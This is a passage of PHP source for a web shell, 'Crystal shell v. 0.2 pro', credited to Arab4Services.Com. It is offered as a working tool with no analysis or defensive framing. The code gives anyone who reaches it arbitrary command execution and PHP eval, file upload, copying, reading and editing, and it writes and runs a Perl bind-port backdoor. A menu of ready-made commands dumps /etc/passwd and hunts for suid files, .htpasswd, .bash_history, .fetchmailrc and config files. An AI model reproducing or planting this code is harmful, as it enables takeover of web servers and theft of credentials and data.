  628. copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
  629. }
  631. if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
  633. {
  634. $data = implode("", file($_POST['filefrom']));
  635. $fp = fopen($_POST['fileto'], "wb");
  636. fputs($fp, $data);
  637. $ok = fclose($fp);
  638. if($ok)
  639. {
  640. $size = filesize($_POST['fileto'])/1024;
  641. $sizef = sprintf("%.2f", $size);
  642. print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
  643. }
  644. else
  645. {
  646. print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
  647. }
  648. }
  650. if (isset($_POST['installbind'])){
  652. if (is_dir($_POST['installpath']) == true){
  653. chdir($_POST['installpath']);
  654. $_POST['installpath'] = "";}
  657. $fp = fopen($_POST['installpath'], "w");
  658. fwrite($fp, $bind);
  659. fclose($fp);
  661. exec("perl " . $_POST['installpath']);
  662. chdir($dir);
  665. }
  668. @$ef = stripslashes($_POST['editfile']);
  669. if ($ef){
  670. $fp = fopen($ef, "r");
  671. $filearr = file($ef);
  675. $string = '';
  676. $content = '';
  677. foreach ($filearr as $string){
  678. $string = str_replace("<" , "&lt;" , $string);
  679. $string = str_replace(">" , "&gt;" , $string);
  680. $content = $content . $string;
  681. }
  683. echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
  684. <input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  685. <input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
  686. <input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
  687. fclose($fp);
  688. }
  690. if(isset($_POST['savefile'])){
  692. $fp = fopen($_POST['savefile'], "w");
  693. $content = stripslashes($content);
  694. fwrite($fp, $content);
  695. fclose($fp);
  696. echo "<center><div id=logostrip>saved -OK!</div></center>";
  698. }
  701. if (isset($_POST['php'])){
  703. echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
  704. <input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
  705. }
  709. if(isset($_POST['phpcode'])){
  711. echo "<center><div id=logostrip>Results of PHP execution<br><br>";
  712. @eval(stripslashes($_POST['phpcode']));
  713. echo "</div></center>";
  716. }
  719. if ($cmd){
  721. if($sertype == "winda"){
  722. ob_start();
  723. execute($cmd);
  724. $buffer = "";
  725. $buffer = ob_get_contents();
  726. ob_end_clean();
  727. }
  728. else{
  729. ob_start();
  730. echo decode(execute($cmd));
  731. $buffer = "";
  732. $buffer = ob_get_contents();
  733. ob_end_clean();
  734. }
  736. if (trim($buffer)){
  737. echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
  738. echo decode($buffer);
  739. echo "</textarea></center></div>";
  740. }
  742. }
  743. $arr = array();
  745. $arr = array_merge($arr, glob("*"));
  746. $arr = array_merge($arr, glob(".*"));
  747. $arr = array_merge($arr, glob("*.*"));
  748. $arr = array_unique($arr);
  749. sort($arr);
  750. echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
  752. foreach ($arr as $filename) {
  754. if ($filename != "." and $filename != ".."){
  756. if (is_dir($filename) == true){
  757. $directory = "";
  758. $directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
  759. if (is_writable($filename) == true){
  760. $directory = $directory . "<td>Yes</td>";}
  761. else{
  762. $directory = $directory . "<td>No</td>";
  764. }
  766. if (is_readable($filename) == true){
  767. $directory = $directory . "<td>Yes</td>";}
  768. else{
  769. $directory = $directory . "<td>No</td>";
  770. }
  771. $dires = $dires . $directory;
  772. }
  774. if (is_file($filename) == true){
  775. $file = "";
  776. $file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
  777. if (is_writable($filename) == true){
  778. $file = $file . "<td>Yes</td>";}
  779. else{
  780. $file = $file . "<td>No</td>";
  781. }
  783. if (is_readable($filename) == true){
  784. $file = $file . "<td>Yes</td></td></tr>";}
  785. else{
  786. $file = $file . "<td>No</td></td></tr>";
  787. }
  788. $files = $files . $file;
  789. }
  793. }
  797. }
  798. echo $dires;
  799. echo $files;
  800. echo "</table><br>";
  805. echo "
  806. <form action=\"$REQUEST_URI\" method=\"POST\">
  807. Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
  810. Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
  812. echo getcwd();
  813. echo "\">
  814. <INPUT type=\"submit\" value=\"..Exec..\"></form>";
  820. if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
  821. Including from here: "
  822. . ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
  827. ?> </td></tr></table></p></td></tr></table></a><br><hr size="1" noshade><b></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  828. <tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
  829. <b>
  830. :: </b>
  831. <font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
  832. <?
  833. echo "
  834. <form action=\"$REQUEST_URI\" method=\"POST\">
  835. Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
  836. ?>
  837. <input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
  838. &nbsp;</p>
  839. </td>
  840. <td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
  841. <form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
  842. <font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
  843. -----------------------------------------------------------</option>
  844. <option value="ls -la /var/lib/mysq">ls MySQL</option>
  845. <option value="which curl">cURL ?</option>
  846. <option value="which wget">Wget ?</option>
  847. <option value="which lynx">Lynx ?</option>
  848. <option value="which links">links ?</option>
  849. <option value="which fetch">fetch ?</option>
  850. <option value="which GET">GET ?</option>
  851. <option value="which per">Perl ?</option>
  852. <option value="gcc --help">C gcc Help ?</option>
  853. <option value="tar --help">tar Help ?</option>
  854. <option value="cat /etc/passwd">Get passwd !!!</option>
  855. <option value="cat /etc/hosts">Get hosts</option>
  856. <option value="perl --help">Perl Help ?</option>
  857. <option value="find / -type f -perm -04000 -ls">
  858. find all suid files</option><option value="find . -type f -perm -04000 -ls">
  859. find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
  860. find all sgid files</option><option value="find . -type f -perm -02000 -ls">
  861. find sgid files in current dir</option><option value="find / -type f -name">
  862. find files</option><option value="find / -type f -name &quot;config*&quot;">
  863. find config* files</option><option value="find . -type f -name &quot;config*&quot;">
  864. find config* files in current dir</option><option value="find / -perm -2 -ls">
  865. find all writable directories and files</option><option value="find . -perm -2 -ls">
  866. find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
  867. find all service.pwd files</option><option value="find . -type f -name service.pwd">
  868. find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
  869. find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
  870. find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
  871. find all .bash_history files</option><option value="find . -type f -name .bash_history">
  872. find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
  873. find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
  874. find .fetchmailrc files in current dir</option><option value="lsattr -va">
  875. list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
  876. show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">Â</font></a><font color="#00FF00"><br>
  877. </font>
  878. <a bookmark="minipanel">
  879. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  880. <tr>
  881. <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
  882. <p align="center">
  883. <a bookmark="minipanel">
  884. <b><font face="verdana" color="red" size="4">
  885. <a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
  886. <font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
  887. file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
  888. &nbsp;<?
  889. if ($act == "edit") {echo "<center><b>ÇáÊÍÑíÑ æÇáÇäÔÇÁ:<br><br> Þã ÈæÖÚ ÇÓã ÇáãáÝ ÇáÐí ÊÑíÏ ÊÍÑíÑå ÝÞØ<br>æÈÚÏ ÐÇáß ÇáÖÛØ Úáì config.php ãËÇá<br>Edit<br>ÓÊÙåÑ áß äÇÝÐå ÈåÇ ãÍÊæíÇÊ ÇáãáÝ <br>æÇíÖÇ ð ÇÐÇ ÇÑÏÊ ÇäÔÇÁ ãáÝ ÝÞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ <br>æÈÚÏ ÐÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt </a>.</b>";}
  890. ?>
  891. </p>
  892. <p>&nbsp;</p>
  893. <p> <?
  894. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  895. File to edit:
  896. <input type=\"text\" name=\"editfile\" >
  897. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  898. <INPUT type=\"submit\" value=\"Edit\"></form></div>";
  899. ?>
  900. </p>
  901. </form></center></p></td>
  902. <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
  903. <?
  904. if ($act == "upload") {echo "<center><b>ÑÝÚ ÇáãáÝÇÊ:<br><br>Þã ÈÊÍÏíÏ ÇáãáÝ ÇáãÑÇÏ ÑÝÚå <br>æÈÚÏ ÐÇáß Þã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ<br>UPLOAD< </a>.</b>";}
  905. ?><a bookmark="minipanel"><b><font size="2">::
  906. </font>
  907. </b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
  908. upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
  909. <?
  910. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  911. <INPUT type=\"file\" name=\"userfile\">
  912. <INPUT type=\"hidden\" name=\"post\" value=\"yes\">
  913. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
  914. <INPUT type=\"submit\" value=\"Download\"></form></div>";
  915. ?>
  916. <p></form></p></td>
  918. </tr>
  919. </table> </a><p><br></p><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
  920. <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
  921. <b>
  922. &nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. <span lang="en-us">0.2</span> <span lang="en-us">pro</span>&nbsp; </b><font color="#CC0000"><b>©oded by</b> </font><b><span lang="en-us"><a href="">Arab4Services.Com</a></span> |<span lang="en-us">Super-Crystal</span> </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
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